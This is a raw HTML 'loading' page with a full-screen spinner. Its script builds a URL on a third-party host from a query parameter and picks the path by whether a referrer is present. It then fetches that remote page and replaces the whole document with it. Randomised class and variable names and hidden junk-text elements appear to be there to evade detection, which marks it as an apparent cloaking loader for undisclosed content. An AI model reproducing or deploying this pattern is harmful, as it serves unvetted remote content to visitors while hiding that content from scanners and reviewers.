<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .S7p5tPPvF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .S7p5tPPvF .xM8C1tLfwU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .S7p5tPPvF .content {
            line-height: 50px;
            text-align: center
        }

        .S7p5tPPvF .img {
            width: 100%
        }

        .S7p5tPPvF .WCDdhm8lhf {
            text-align: center
        }

        .S7p5tPPvF .WCDdhm8lhf span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .S7p5tPPvF .WCDdhm8lhf span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .S7p5tPPvF .WCDdhm8lhf span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .S7p5tPPvF .WCDdhm8lhf span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .S7p5tPPvF .WCDdhm8lhf span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .S7p5tPPvF .WCDdhm8lhf span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .S7p5tPPvF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XK8OBiBZmd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TYcnGey = XK8OBiBZmd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TYcnGey +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TYcnGey +".html?a=share";
		}
		
        Ubwfi7Lf=url+"#"+new Date().getTime();
        Ubwfi7Lf && function() {
            $.get(Ubwfi7Lf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>Fvv5Bbd3uy3AiUsHEz4AprJmbyYF11vtSsXtFOHTVB3dZToR</p>
<img  src='' style='display:none'>
<span style='display:none'>MlxV3YQMydwRbB8quwne3CXE3AIn64vQCqkW17Cm94Ma</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>I7ICNaFAUEWODzC3Np9jGkYY1DOLhHSzmJ51088wgr8Bm8eNCDMY6eQd6X6mPhNNhoklvgdb145</a><div class="S7p5tPPvF">
    <div class="xM8C1tLfwU">
        <div class="WCDdhm8lhf">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>xs2Mb5Z3bX42hyrEy</p>
<a  href='#' style='display:none'>jjj0ufBzIPhTH7XFKWMrmVt8gCae2gWpKN7Bmq2tWHrB9EsE5UCEw8VH2ycnjEnj05y7rlQfIvOC80lfiOB3AdrQPoOTqJNQzH</a>
<span style='display:none'>FwHFZ4sAGNTPOqVFXV47CjgidN9s</span>
<li style='display:none' >p1qH2Zxd0EBxPweFs2iftBbwSCJSgDXpm7TUDCeIH5tYYtMA4G7B4CiSdVIjXyZfq17QD</li>
<span style='display:none'>FwHFZ4sAGNTPOqVFXV47CjgidN9s</span>
<b style='display:none' >qXjpnCSOJKO5AAYb98g5qRgPw0y2uFHbTPNxm4Efe9O9akG5FEJ1E4WkzrpnGq3xNsB0xQbPKj</b>
<h1 style='display:none' >uOleDynNc5zel9VegpWVwT4x2OWvnnFBHix7wVu7ORSE29mSC7KsRm5WWdkLp5Hi</h1></body>
</html>